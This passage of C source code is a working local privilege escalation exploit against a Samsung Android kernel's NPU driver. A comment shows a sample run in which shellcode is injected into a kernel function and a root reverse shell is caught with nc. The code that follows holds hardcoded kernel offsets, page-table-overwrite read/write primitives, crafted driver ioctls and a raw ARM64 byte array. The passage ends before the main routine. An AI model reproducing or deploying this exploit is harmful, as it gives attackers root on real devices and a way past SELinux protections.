| ffffff8845fb9280 -> smdexe | |
| ffffff8845fb8000 -> diagexe | |
| ffffff8850015c80 -> ddexe | |
| ffffff8850013780 -> connfwexe | |
| ffffff885bbbdc80 -> binder:1069_2 | |
| ffffff885b964a00 -> kbase_event | |
| ffffff885bbba500 -> mediaextractor | |
| ffffff885d935c80 -> mediametrics | |
| ffffff885d933780 -> mediaserver | |
| ffffff885b963780 -> speg_helper | |
| ffffff885f781280 -> spqr_service | |
| ffffff885d8d2500 -> storaged | |
| ffffff885d8d0000 -> wificond | |
| ffffff8860452500 -> [email protected] | |
| ffffff8860450000 -> argosd | |
| ffffff8860454a00 -> cbd | |
| ffffff8860455c80 -> gpsd | |
| ffffff8860453780 -> epic | |
| ffffff8860451280 -> memlogd | |
| ffffff885bbbca00 -> [email protected] | |
| ffffff885b843780 -> rild | |
| ffffff8860663780 -> wlbtd | |
| ffffff8860662500 -> mediaswcodec | |
| ffffff8860664a00 -> gatekeeperd | |
| ffffff8860773780 -> abox_log | |
| ffffff8860771280 -> [email protected] | |
| ffffff8872700000 -> kworker/u17:2 | |
| ffffff888423ca00 -> multiclientd | |
| ffffff886a343780 -> system_server | |
| ffffff8877172500 -> kbase_event | |
| ffffff88a8db3780 -> m.android.phone | |
| ffffff886a342500 -> ndroid.systemui | |
| ffffff88aaf3a500 -> kworker/6:36H | |
| ffffff88aaf38000 -> kworker/6:37H | |
| ffffff88aaf3dc80 -> kworker/6:38H | |
| ffffff88aaf83780 -> kworker/6:39H | |
| ffffff88aaf82500 -> kworker/6:40H | |
| ffffff88aaf29280 -> webview_zygote | |
| ffffff88a5fb4a00 -> rkstack.process | |
| ffffff805a402500 -> com.sec.epdg | |
| ffffff88bc980000 -> com.sec.sve | |
| ffffff805a723780 -> com.android.nfc | |
| ffffff805a721280 -> .sec.imsservice | |
| ffffff88b3642500 -> com.android.se | |
| ffffff88b3640000 -> ris.tui_service | |
| ffffff8058ceb780 -> id.app.launcher | |
| ffffff8004802500 -> id.ext.services | |
| ffffff8009b0ca00 -> [email protected] | |
| ffffff800a371280 -> kworker/u17:3 | |
| ffffff800a892500 -> location.nsflp2 | |
| ffffff800ab4dc80 -> perfsdkserver | |
| ffffff80586e1280 -> loop46 | |
| ffffff800a3c3780 -> zram0_wbd | |
| ffffff800f75ca00 -> pageboostd | |
| ffffff800f759280 -> adbd | |
| ffffff800ecbca00 -> kbase_event | |
| ffffff802a233780 -> .gms.persistent | |
| ffffff802a231280 -> rs.media.module | |
| ffffff8032c42500 -> hbox:interactor | |
| ffffff8032f81280 -> s.messaging:rcs | |
| ffffff804288a500 -> id.diagmonagent | |
| ffffff8042888000 -> c.android.sdhms | |
| ffffff8032c44a00 -> d.process.media | |
| ffffff885b841280 -> earchbox:search | |
| ffffff804f9db780 -> kbase_event | |
| ffffff801a0ea500 -> kworker/1:2H | |
| ffffff8050aedc80 -> kworker/2:2H | |
| ffffff8057cfdc80 -> kworker/7:78H | |
| ffffff8057ea0000 -> kworker/7:82H | |
| ffffff8057ea9280 -> kworker/7:88H | |
| ffffff8057ea8000 -> kworker/3:2H | |
| ffffff8057fd1280 -> kworker/4:3H | |
| ffffff806ad7dc80 -> kworker/0:194H | |
| ffffff806add9280 -> kworker/0:206H | |
| ffffff806ae32500 -> kworker/0:217H | |
| ffffff806ae30000 -> kworker/0:218H | |
| ffffff806ae40000 -> kworker/0:219H | |
| ffffff806ae44a00 -> kworker/0:220H | |
| ffffff806ae45c80 -> kworker/0:221H | |
| ffffff806ae43780 -> kworker/0:222H | |
| ffffff806ae41280 -> kworker/0:223H | |
| ffffff806ae42500 -> kworker/0:224H | |
| ffffff806ae92500 -> kworker/0:225H | |
| ffffff806ae90000 -> kworker/0:226H | |
| ffffff806ae94a00 -> kworker/0:227H | |
| ffffff806ae95c80 -> kworker/0:228H | |
| ffffff806ae93780 -> kworker/0:229H | |
| ffffff806ae91280 -> kworker/0:230H | |
| ffffff806ae9a500 -> kworker/0:231H | |
| ffffff806ae98000 -> kworker/0:232H | |
| ffffff806ae9ca00 -> kworker/0:233H | |
| ffffff806ae9dc80 -> kworker/0:234H | |
| ffffff806ae9b780 -> kworker/0:235H | |
| ffffff806ae99280 -> kworker/0:236H | |
| ffffff806aeeb780 -> kworker/0:237H | |
| ffffff806aee9280 -> kworker/0:238H | |
| ffffff806aeea500 -> kworker/0:239H | |
| ffffff806aee8000 -> kworker/0:240H | |
| ffffff806aeeca00 -> kworker/0:241H | |
| ffffff806aeedc80 -> kworker/0:242H | |
| ffffff806aef5c80 -> kworker/0:243H | |
| ffffff806aef3780 -> kworker/0:244H | |
| ffffff806aef1280 -> kworker/0:245H | |
| ffffff806aef2500 -> kworker/0:246H | |
| ffffff806aef0000 -> kworker/0:247H | |
| ffffff806aef4a00 -> kworker/0:248H | |
| ffffff806af4ca00 -> kworker/0:249H | |
| ffffff806af4dc80 -> kworker/0:250H | |
| ffffff806af4b780 -> kworker/0:251H | |
| ffffff806af49280 -> kworker/0:252H | |
| ffffff806af4a500 -> kworker/0:253H | |
| ffffff806af48000 -> kworker/0:254H | |
| ffffff806af54a00 -> kworker/0:255H | |
| ffffff806af53780 -> kworker/0:257H | |
| ffffff806d3e8000 -> ogle.android.as | |
| ffffff88b7394a00 -> gle.android.gms | |
| ffffff8819190000 -> com.wssyncmldm | |
| ffffff8079931280 -> martsuggestions | |
| ffffff8829613780 -> id.app.routines | |
| ffffff801a0eb780 -> wifi.mobilewips | |
| ffffff883b080000 -> irq/190-dwc3 | |
| ffffff882b694a00 -> com.samsung.cmh | |
| ffffff884f7dca00 -> ung.android.scs | |
| ffffff8867eb9280 -> kworker/5:2H | |
| ffffff88a35d4a00 -> kbase_event | |
| ffffff88393f8000 -> d.process.acore | |
| ffffff88393fca00 -> ung.android.fmm | |
| ffffff88b550a500 -> .app.aodservice | |
| ffffff802527a500 -> sh | |
| ffffff8008df8000 -> droid.messaging | |
| ffffff8030e8b780 -> su | |
| ffffff806d37b780 -> sh | |
| ffffff8030e84a00 -> kworker/3:2 | |
| ffffff806ce14a00 -> d.beaconmanager | |
| ffffff88a4c33780 -> droid.bluetooth | |
| ffffff88bd54dc80 -> msung.klmsagent | |
| ffffff8051923780 -> fwhdr_crc_wq | |
| ffffff88f1ff8000 -> mxmgmt_thread_w | |
| ffffff8051920000 -> mxlog_thread | |
| ffffff88bcf7dc80 -> sh | |
| ffffff88b3468000 -> cControlService | |
| ffffff8059e6ca00 -> exp1337 | |
| [+] found current process | |
| [+] current->files->fdt->fd 0xffffff88a3300000 | |
| [+] current->mm 0xffffff8834458b40 | |
| [+] current->mm->pgd 0xffffff88fee68000 | |
| [+] offset_logline 0x818 | |
| [+] offset_pud 0x1e4 | |
| [+] offset_pmd 0x190 | |
| [+] offset_pte 0x19 | |
| [+] pud 0x8000008b6e1c003 | |
| [+] pmd 0x8b6e1b003 | |
| [+] pte_logline 0x6000089aed9fc3 | |
| [+] shellcode injected into LogLine | |
| [+] execute nc -lp 1337 and press key here | |
| [+] trigger lpe | |
| [+] look at root reverse shell :) | |
| [+] LogLine function restaured | |
| [+] clean up | |
| [+] finish | |
| a25x:/ $ | |
| a25x:/ $ nc -lp 1337 | |
| id | |
| uid=0(root) gid=0(root) groups=0(root),3009(readproc) context=u:r:sec_system_init_shell:s0 | |
| */ | |
| #define _GNU_SOURCE | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <stdint.h> | |
| #include <stdbool.h> | |
| #include <fcntl.h> | |
| #include <unistd.h> | |
| #include <errno.h> | |
| #include <string.h> | |
| #include <pthread.h> | |
| #include <sys/wait.h> | |
| #include <sys/syscall.h> | |
| #include <time.h> | |
| #include <sys/ioctl.h> | |
| #include <sys/mman.h> | |
| #include <sys/prctl.h> | |
| #include <sys/signalfd.h> | |
| #include <signal.h> | |
| #include <sys/stat.h> | |
| #include <math.h> | |
| #define OBJECT_SIZE 128 | |
| #define OBJS_PER_SLAB 32 | |
| #define CPU_PARTIAL 512 | |
| #define NUM_FILES 0x3800 | |
| #define NUM_TABLE 32 | |
| #define NUM_PTE 512 | |
| #define DMA_HEAP_IOC_MAGIC 'H' | |
| #define DMA_HEAP_IOCTL_ALLOC _IOWR(DMA_HEAP_IOC_MAGIC, 0x0, struct dma_heap_allocation_data) | |
| #define NCP_MAGIC1 0x0C0FFEE0 | |
| #define NCP_MAGIC2 0xC0DEC0DE | |
| #define VS4L_DF_IMAGE(a, b, c, d) ((a) | (b << 8) | (c << 16) | (d << 24)) | |
| #define VS4L_DF_IMAGE_NPU VS4L_DF_IMAGE('N', 'P', 'U', '0') | |
| #define VS4L_VERTEXIOC_S_GRAPH _IOW('V', 0, struct vs4l_graph) | |
| #define VS4L_VERTEXIOC_S_FORMAT _IOW('V', 1, struct vs4l_format_list) | |
| #define VS4L_VERTEXIOC_STREAM_ON _IO('V', 4) | |
| #define VS4L_VERTEXIOC_STREAM_OFF _IO('V', 5) | |
| #define MAX_PIPES 256 | |
| #define MAX_SIGNAL 32 | |
| #define N 1 // kcalloc arbitrary size N * 80 / 0 < N <= 16 | |
| #define LINUX_ARM64_IMAGE_MAGIC 0x644d5241 | |
| #define KERNEL_DATA 0x1de0000 | |
| #define SELINUX_STATE 0x3ea000 | |
| #define OFF_SELINUX_STATE 0x968 | |
| #define INIT_TASK 0x1d000 | |
| #define OFF_INIT_TASK 0xe80 | |
| #define OFFSET_TASKS 0x4c8 | |
| #define OFFSET_MM 0x518 | |
| #define OFFSET_PID 0x5c8 | |
| #define OFFSET_CRED 0x780 | |
| #define OFFSET_COMM 0x790 | |
| #define OFFSET_FS 0x7b8 | |
| #define OFFSET_FILES 0x7c0 | |
| #define OFFSET_PGD 0x48 | |
| #define OFFSET_FDT 0x20 | |
| #define OFFSET_FD 0x8 | |
| int fd; | |
| int fd_read; | |
| int pipefd[MAX_PIPES][2]; | |
| int fd_init[NUM_FILES]; | |
| int fd_cross[(CPU_PARTIAL * OBJS_PER_SLAB) + MAX_SIGNAL + 1]; | |
| char *map[NUM_TABLE][NUM_PTE]; | |
| uint32_t phys_off; | |
| uint64_t pmd[4]; | |
| uint8_t offset_pgt; | |
| sigset_t mask; | |
| enum vs4l_direction { | |
| VS4L_DIRECTION_IN = 1, | |
| VS4L_DIRECTION_OT | |
| }; | |
| struct vs4l_graph { | |
| uint32_t id; | |
| uint32_t priority; | |
| uint32_t time; /* in millisecond */ | |
| uint32_t flags; | |
| uint32_t size; | |
| unsigned long addr; | |
| }; | |
| struct vs4l_format_list { | |
| uint32_t direction; | |
| uint32_t count; | |
| struct vs4l_format *formats; | |
| }; | |
| struct vs4l_format { | |
| uint32_t target; | |
| uint32_t format; | |
| uint32_t plane; | |
| uint32_t width; | |
| uint32_t height; | |
| uint32_t stride; | |
| uint32_t cstride; | |
| uint32_t channels; | |
| uint32_t pixel_format; | |
| }; | |
| struct drv_user_share { | |
| uint32_t id; | |
| int ncp_fd; | |
| uint32_t ncp_size; | |
| unsigned long ncp_mmap; | |
| }; | |
| struct dma_heap_allocation_data { | |
| uint64_t len; | |
| uint32_t fd; | |
| uint32_t fd_flags; | |
| uint64_t heap_flags; | |
| }; | |
| struct ncp_header { | |
| uint32_t magic_number1; | |
| uint32_t hdr_version; | |
| uint32_t hdr_size; | |
| uint32_t intrinsic_version; | |
| uint32_t net_id; | |
| uint32_t unique_id; | |
| uint32_t priority; | |
| uint32_t flags; | |
| uint32_t period; | |
| uint32_t workload; | |
| uint32_t total_flc_transfer_size; | |
| uint32_t total_sdma_transfer_size; | |
| uint32_t address_vector_offset; | |
| uint32_t address_vector_cnt; | |
| uint32_t memory_vector_offset; | |
| uint32_t memory_vector_cnt; | |
| uint32_t group_vector_offset; | |
| uint32_t group_vector_cnt; | |
| uint32_t thread_vector_offset; | |
| uint32_t thread_vector_cnt; | |
| uint32_t body_version; | |
| uint32_t body_offset; | |
| uint32_t body_size; | |
| uint32_t io_vector_offset; | |
| uint32_t io_vector_cnt; | |
| uint32_t rq_vector_offset; | |
| uint32_t rq_vector_size; | |
| uint32_t reserved[8]; | |
| uint32_t magic_number2; | |
| }; | |
| struct group_vector { | |
| uint32_t index; | |
| uint32_t id; | |
| uint32_t type; | |
| uint32_t size; | |
| uint32_t status; | |
| uint32_t flags; | |
| uint32_t batch; | |
| uint32_t intrinsic_offset; | |
| uint32_t intrinsic_size; | |
| uint32_t isa_offset; | |
| uint32_t isa_size; | |
| }; | |
| struct memory_vector { | |
| uint32_t type; | |
| uint32_t pixel_format; | |
| uint32_t width; | |
| uint32_t height; | |
| uint32_t channels; | |
| uint32_t wstride; | |
| uint32_t cstride; | |
| uint32_t address_vector_index; | |
| }; | |
| struct address_vector { | |
| uint32_t index; | |
| uint32_t m_addr; | |
| uint32_t s_addr; | |
| uint32_t size; | |
| }; | |
| enum ncp_memory_type { | |
| MEMORY_TYPE_IN_FMAP, /* input feature map */ | |
| MEMORY_TYPE_OT_FMAP, /* output feature map */ | |
| MEMORY_TYPE_IM_FMAP, /* intermediate feature map */ | |
| MEMORY_TYPE_OT_PIX0, | |
| MEMORY_TYPE_OT_PIX1, | |
| MEMORY_TYPE_OT_PIX2, | |
| MEMORY_TYPE_OT_PIX3, | |
| MEMORY_TYPE_WEIGHT, | |
| MEMORY_TYPE_WMASK, | |
| MEMORY_TYPE_LUT, | |
| MEMORY_TYPE_NCP, | |
| MEMORY_TYPE_GOLDEN, | |
| MEMORY_TYPE_CUCODE, | |
| MEMORY_TYPE_MAX | |
| }; | |
| struct ncp_blob { | |
| uint32_t vector; | |
| uint32_t offset; | |
| uint32_t format; | |
| uint32_t bpp; | |
| uint32_t n; | |
| uint32_t c; | |
| uint32_t h; | |
| uint32_t w; | |
| uint32_t w_stride; | |
| uint32_t c_stride; | |
| uint32_t n_stride; | |
| }; | |
| struct dma_simple_option { | |
| uint32_t src_vector; | |
| uint32_t src_offset; | |
| uint32_t dst_vector; | |
| uint32_t dst_offset; | |
| uint32_t size; | |
| }; | |
| struct dma_blob_option { | |
| struct ncp_blob src; | |
| struct ncp_blob dst; | |
| }; | |
| struct io_desc { | |
| uint32_t uid; | |
| uint32_t bid; | |
| uint32_t sgid; | |
| uint32_t wait_flag; | |
| uint32_t trig_flag; | |
| uint32_t mode; | |
| uint32_t pad; | |
| uint32_t scale; | |
| uint32_t bias; | |
| union { | |
| struct dma_simple_option simple; | |
| struct dma_blob_option blob; | |
| } option; | |
| }; | |
| struct pipe_buffer { | |
| uint64_t page; | |
| uint32_t offset; | |
| uint32_t len; | |
| uint64_t ops; | |
| uint32_t flags; | |
| uint32_t pad; | |
| uint64_t private; | |
| }; | |
| struct pipe_buf_operations { | |
| uint64_t confirm; | |
| uint64_t release; | |
| uint64_t steal; | |
| uint64_t get; | |
| }; | |
| struct dma_heap_allocation_data data; | |
| struct drv_user_share user_data; | |
| struct vs4l_graph graph; | |
| struct ncp_header *ncp; | |
| struct group_vector *gv; | |
| struct address_vector *av; | |
| struct memory_vector *mv; | |
| #define MEMSTART 0x80000000UL | |
| #define VIRTUAL_KERNEL_START 0xffffffc008000000UL | |
| #define LINEAR_MAP_START 0xffffff8000000000UL | |
| bool is_lm_addr(uint64_t kaddr) | |
| { | |
| return (kaddr & (VIRTUAL_KERNEL_START - (0x8 << (6 * 4)))) == LINEAR_MAP_START; | |
| } | |
| uint64_t virt_to_phys(uint64_t kaddr) | |
| { | |
| if (is_lm_addr(kaddr)) { | |
| return kaddr - LINEAR_MAP_START + MEMSTART; | |
| } else { | |
| return kaddr - VIRTUAL_KERNEL_START + MEMSTART; | |
| } | |
| } | |
| uint64_t phys_to_virt(uint64_t paddr, bool is_lm_addr) | |
| { | |
| if (is_lm_addr) { | |
| return paddr + LINEAR_MAP_START - MEMSTART; | |
| } else { | |
| return paddr + VIRTUAL_KERNEL_START - MEMSTART; | |
| } | |
| } | |
| uint64_t vmemmap = 0xffffffff00000000UL; | |
| uint64_t virt_to_page(uint64_t kaddr) | |
| { | |
| return vmemmap + (((virt_to_phys(kaddr) - MEMSTART) >> 12) << 6); | |
| } | |
| uint64_t page_to_virt(uint64_t page, bool is_lm_addr) | |
| { | |
| return phys_to_virt((((page - vmemmap) >> 6) << 12) + MEMSTART, is_lm_addr); | |
| } | |
| int ncpu; | |
| bool pin_cpu(int cpu) { | |
| cpu_set_t set; | |
| CPU_ZERO(&set); | |
| CPU_SET(cpu, &set); | |
| if (sched_setaffinity(0, sizeof(set), &set) < 0) { | |
| perror("[-] sched_setafinnity(): "); | |
| return false; | |
| } | |
| return true; | |
| } | |
| char *page, *victim; | |
| #define TLB 0x28000UL | |
| uint64_t *full_tlb; | |
| /* replace tlb cache */ | |
| void replace_tlb(void) { | |
| /* change context */ | |
| sync(); | |
| /* access pages */ | |
| uint32_t junk = 0; | |
| for (uint32_t i = 0; i < TLB; i++) { | |
| uint64_t idx = (uint64_t) (full_tlb + i * 512) & ~0x1fffff; | |
| if (idx == pmd[0] || idx == pmd[1] || idx == pmd[2] || idx == pmd[3]) { | |
| // printf("[*] avoiding pmd 0x%lx\n", idx); | |
| continue; | |
| } | |
| full_tlb[i * 512] = i; | |
| full_tlb[(i * 512) + 1] = i; | |
| if (full_tlb[i * 512] && full_tlb[(i * 512) + 1]) junk++; | |
| } | |
| } | |
| uint64_t read64(uint64_t addr) { | |
| uint32_t off = addr & 0xfff; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| uint64_t pte = ((virt_to_phys(addr) >> 12) << 12) | 0xe8000000000f43; | |
| *(uint64_t *) (victim + offset_pgt) = pte; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| uint64_t data = *(uint64_t *) (page + off); | |
| return data; | |
| } | |
| void write64(uint64_t addr, uint64_t data) { | |
| uint32_t off = addr & 0xfff; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| uint64_t pte = ((virt_to_phys(addr) >> 12) << 12) | 0xe8000000000f43; | |
| *(uint64_t *) (victim + offset_pgt) = pte; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| *(uint64_t *) (page + off) = data; | |
| } | |
| void write32(uint64_t addr, uint32_t data) { | |
| uint32_t off = addr & 0xfff; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| uint64_t pte = ((virt_to_phys(addr) >> 12) << 12) | 0xe8000000000f43; | |
| *(uint64_t *) (victim + offset_pgt) = pte; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| *(uint32_t *) (page + off) = data; | |
| } | |
| void write16(uint64_t addr, uint16_t data) { | |
| uint32_t off = addr & 0xfff; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| uint64_t pte = ((virt_to_phys(addr) >> 12) << 12) | 0xe8000000000f43; | |
| *(uint64_t *) (victim + offset_pgt) = pte; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| *(uint16_t *) (page + off) = data; | |
| } | |
| void write8(uint64_t addr, uint8_t data) { | |
| uint32_t off = addr & 0xfff; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| uint64_t pte = ((virt_to_phys(addr) >> 12) << 12) | 0xe8000000000f43; | |
| *(uint64_t *) (victim + offset_pgt) = pte; | |
| /* replace tlb cache */ | |
| replace_tlb(); | |
| *(page + off) = data; | |
| } | |
| uint32_t get_directory(uint64_t addr) { | |
| return addr & 0x1ff; | |
| } | |
| void init_ncp_header(struct ncp_header *ncp) { | |
| memset(ncp, 0x0, sizeof(struct ncp_header)); | |
| ncp->magic_number1 = NCP_MAGIC1; | |
| ncp->magic_number2 = NCP_MAGIC2; | |
| ncp->hdr_version = 24; | |
| ncp->hdr_size = 4096; | |
| ncp->intrinsic_version = 24; | |
| ncp->memory_vector_cnt = 2; | |
| ncp->memory_vector_offset = sizeof(struct ncp_header) * 3; | |
| ncp->address_vector_cnt = 2; | |
| ncp->address_vector_offset = sizeof(struct ncp_header) * 2; | |
| //ncp->group_vector_cnt = 1; | |
| //ncp->group_vector_offset = sizeof(struct ncp_header); | |
| } | |
| void prepare_graph(struct drv_user_share *user_data, struct vs4l_graph *graph, struct dma_heap_allocation_data *data) { | |
| memset(user_data, 0x0, sizeof(struct drv_user_share)); | |
| user_data->ncp_fd = data->fd; | |
| user_data->ncp_size = 0x1000; | |
| memset(graph, 0x0, sizeof(struct vs4l_graph)); | |
| graph->addr = (unsigned long) user_data; | |
| } | |
| void do_graph_ioctl(int fd, struct ncp_header *ncp, struct address_vector *av, struct memory_vector *mv, struct vs4l_graph *graph, uint32_t type, uint32_t n) { | |
| /* | |
| * bpp = mv->pixel_format; | |
| * cal_size = (bpp / 8) * mv->channels * mv->width * mv->height; | |
| * if (av->size > cal_size) error | |
| */ | |
| ncp->memory_vector_cnt = n; | |
| ncp->address_vector_cnt = n; | |
| memset(av, 0x0, sizeof(struct address_vector)); | |
| av->index = 0; | |
| memset(mv, 0x0, sizeof(struct memory_vector)); | |
| mv->type = type; | |
| puts("[+] ioctl graph"); | |
| int ret = ioctl(fd, VS4L_VERTEXIOC_S_GRAPH, graph); | |
| if (ret < 0) { | |
| printf("[-] couldn't ioctl VS4L_VERTEXIOC_S_GRAPH: %d\n", errno); | |
| exit(0); | |
| } | |
| } | |
| void do_format_ioctl(int fd, uint32_t count, uint32_t direction, uint32_t f) { | |
| struct vs4l_format format[3]; | |
| memset(format, 0x0, sizeof(format)); | |
| for (int j = 0; j < 3; j++) { | |
| format[j].format = f; | |
| format[j].height = 64; | |
| format[j].width = 64; | |
| format[j].pixel_format = 8; | |
| format[j].channels = 15; | |
| } | |
| struct vs4l_format_list format_list; | |
| memset(&format_list, 0x0, sizeof(struct vs4l_format_list)); | |
| format_list.count = count; | |
| format_list.direction = direction; | |
| format_list.formats = format; | |
| puts("[+] ioctl format"); | |
| int ret = ioctl(fd, VS4L_VERTEXIOC_S_FORMAT, &format_list); | |
| if (f != 1337) { | |
| if (ret < 0) { | |
| printf("[-] couldn't ioctl VS4L_VERTEXIOC_S_FORMAT: %d\n", errno); | |
| exit(0); | |
| } | |
| } | |
| } | |
| void hexdump(uint64_t *buf, uint64_t size) { | |
| for (int i = 0; i < size / 8; i += 2) { | |
| printf("0x%x ", i * 8); | |
| printf("%016lx %016lx\n", buf[i], buf[i + 1]); | |
| } | |
| } | |
| char logline[576] = {0xFF, 0x03, 0x03, 0xD1, 0xFD, 0x7B, 0x06, 0xA9, 0xFC, 0x6F, 0x07, 0xA9, 0xFA, 0x67, 0x08, 0xA9, 0xF8, 0x5F, 0x09, 0xA9, 0xF6, 0x57, 0x0A, 0xA9, 0xF4, 0x4F, 0x0B, 0xA9, 0xFD, 0x83, 0x01, 0x91, 0x5C, 0xD0, 0x3B, 0xD5, 0xF6, 0x03, 0x02, 0x2A, 0xF4, 0x03, 0x01, 0x2A, 0x88, 0x17, 0x40, 0xF9, 0xF5, 0x03, 0x00, 0xAA, 0xC0, 0x03, 0x80, 0x52, 0xE1, 0x03, 0x1F, 0x2A, 0xE2, 0x03, 0x1F, 0x2A, 0xF3, 0x03, 0x04, 0xAA, 0xF7, 0x03, 0x03, 0xAA, 0xA8, 0x83, 0x1F, 0xF8, 0x29, 0x8D, 0x00, 0x94, 0xE0, 0x01, 0x00, 0x34, 0xC8, 0x0A, 0x00, 0x11, 0xDF, 0x16, 0x00, 0x71, 0xEA, 0x00, 0x80, 0x52, 0x09, 0x06, 0x80, 0x52, 0x0B, 0x00, 0xB0, 0x12, 0x08, 0x31, 0x8A, 0x1A, 0xE0, 0x23, 0x00, 0x91, 0xF7, 0xD7, 0x01, 0xA9, 0xE9, 0x07, 0x00, 0xF9, 0xEB, 0x23, 0x02, 0x29, 0xFF, 0xCF, 0x02, 0xA9, 0xF4, 0x2B, 0x00, 0xB9, 0x91, 0x91, 0x00, 0x94, 0x62, 0x00, 0x00, 0x14, 0x17, 0x03, 0x00, 0xB4, 0x1F, 0x20, 0x03, 0xD5, 0xE8, 0x2A, 0x1E, 0x10, 0xF9, 0x01, 0x00, 0x90, 0x08, 0xFD, 0xDF, 0x08, 0x28, 0x0D, 0x00, 0x36, 0x28, 0x03, 0x47, 0xF9, 0xB6, 0x7F, 0x3E, 0x29, 0xF7, 0x07, 0x00, 0xF9, 0xB5, 0x83, 0x1E, 0xF8, 0x00, 0x11, 0x40, 0xF9, 0xB4, 0x43, 0x1E, 0xB8, 0xB3, 0x83, 0x1D, 0xF8, 0x00, 0x0C, 0x00, 0xB4, 0x08, 0x00, 0x40, 0xF9, 0xA1, 0x33, 0x00, 0xD1, 0xA2, 0x43, 0x00, 0xD1, 0xE3, 0x23, 0x00, 0x91, 0xA4, 0x63, 0x00, 0xD1, 0xA5, 0x73, 0x00, 0xD1, 0x08, 0x19, 0x40, 0xF9, 0xA6, 0xA3, 0x00, 0xD1, 0x00, 0x01, 0x3F, 0xD6, 0x4A, 0x00, 0x00, 0x14, 0x1F, 0x20, 0x03, 0xD5, 0x08, 0x27, 0x1E, 0x10, 0xF8, 0x01, 0x00, 0x90, 0x08, 0xFD, 0xDF, 0x08, 0x08, 0x0D, 0x00, 0x36, 0x17, 0xF3, 0x46, 0xF9, 0xE0, 0x03, 0x17, 0xAA, 0xD4, 0x90, 0x00, 0x94, 0xF9, 0x01, 0x00, 0x90, 0x28, 0xEB, 0x46, 0xF9, 0x48, 0x04, 0x00, 0xB5, 0x00, 0x03, 0x80, 0x52, 0xD3, 0x8F, 0x00, 0x94, 0xF8, 0x03, 0x00, 0xAA, 0x09, 0x91, 0x00, 0x94, 0xFB, 0x03, 0x00, 0xAA, 0x1F, 0xFF, 0x00, 0xA9, 0x1F, 0x03, 0x00, 0xF9, 0x35, 0x90, 0x00, 0x94, 0x1F, 0x40, 0x00, 0xB1, 0x82, 0x0F, 0x00, 0x54, 0xFA, 0x03, 0x00, 0xAA, 0x1F, 0x5C, 0x00, 0xF1, 0xFB, 0x03, 0x00, 0xF9, 0xC2, 0x00, 0x00, 0x54, 0x48, 0x7B, 0x1F, 0x53, 0xFB, 0x03, 0x18, 0xAA, 0x68, 0x17, 0x00, 0x38, 0x5A, 0x01, 0x00, 0xB5, 0x0D, 0x00, 0x00, 0x14, 0x59, 0x0F, 0x40, 0xB2, 0x20, 0x07, 0x00, 0x91, 0xBF, 0x8F, 0x00, 0x94, 0x28, 0x0B, 0x00, 0x91, 0xFB, 0x03, 0x00, 0xAA, 0xF9, 0x01, 0x00, 0x90, 0x1A, 0x83, 0x00, 0xA9, 0x08, 0x03, 0x00, 0xF9, 0xE0, 0x03, 0x1B, 0xAA, 0xE1, 0x03, 0x40, 0xF9, 0xE2, 0x03, 0x1A, 0xAA, 0x22, 0x90, 0x00, 0x94, 0x7F, 0x6B, 0x3A, 0x38, 0x38, 0xEB, 0x06, 0xF9, 0x1F, 0x20, 0x03, 0xD5, 0x88, 0x22, 0x1E, 0x10, 0x08, 0xFD, 0xDF, 0x08, 0x48, 0x09, 0x00, 0x36, 0x28, 0xEB, 0x46, 0xF9, 0xE9, 0x01, 0x00, 0x90, 0x0A, 0x01, 0x40, 0x39, 0xB6, 0x7F, 0x3E, 0x29, 0x0B, 0x09, 0x40, 0xF9, 0xB5, 0x83, 0x1E, 0xF8, 0x29, 0x01, 0x47, 0xF9, 0xB4, 0x43, 0x1E, 0xB8, 0x5F, 0x01, 0x00, 0x72, 0xB3, 0x83, 0x1D, 0xF8, 0x68, 0x15, 0x88, 0x9A, 0x20, 0x11, 0x40, 0xF9, 0xE8, 0x07, 0x00, 0xF9, 0x00, 0x03, 0x00, 0xB4, 0x08, 0x00, 0x40, 0xF9, 0xA1, 0x33, 0x00, 0xD1, 0xA2, 0x43, 0x00, 0xD1, 0xE3, 0x23, 0x00, 0x91, 0xA4, 0x63, 0x00, 0xD1, 0xA5, 0x73, 0x00, 0xD1, 0x08, 0x19, 0x40, 0xF9, 0xA6, 0xA3, 0x00, 0xD1, 0x00, 0x01, 0x3F, 0xD6, 0xE0, 0x03, 0x17, 0xAA, 0x9B, 0x90, 0x00, 0x94, 0x88, 0x17, 0x40, 0xF9, 0xA9, 0x83, 0x5F, 0xF8, 0x1F, 0x01, 0x09, 0xEB, 0xC1, 0x08, 0x00, 0x54, 0xF4, 0x4F, 0x4B, 0xA9, 0xF6, 0x57, 0x4A, 0xA9, 0xF8, 0x5F, 0x49, 0xA9, 0xFA, 0x67, 0x48, 0xA9, 0xFC, 0x6F, 0x47, 0xA9, 0xFD, 0x7B, 0x46, 0xA9, 0xFF, 0x03, 0x03, 0x91, 0xC0, 0x03, 0x5F, 0xD6}; | |
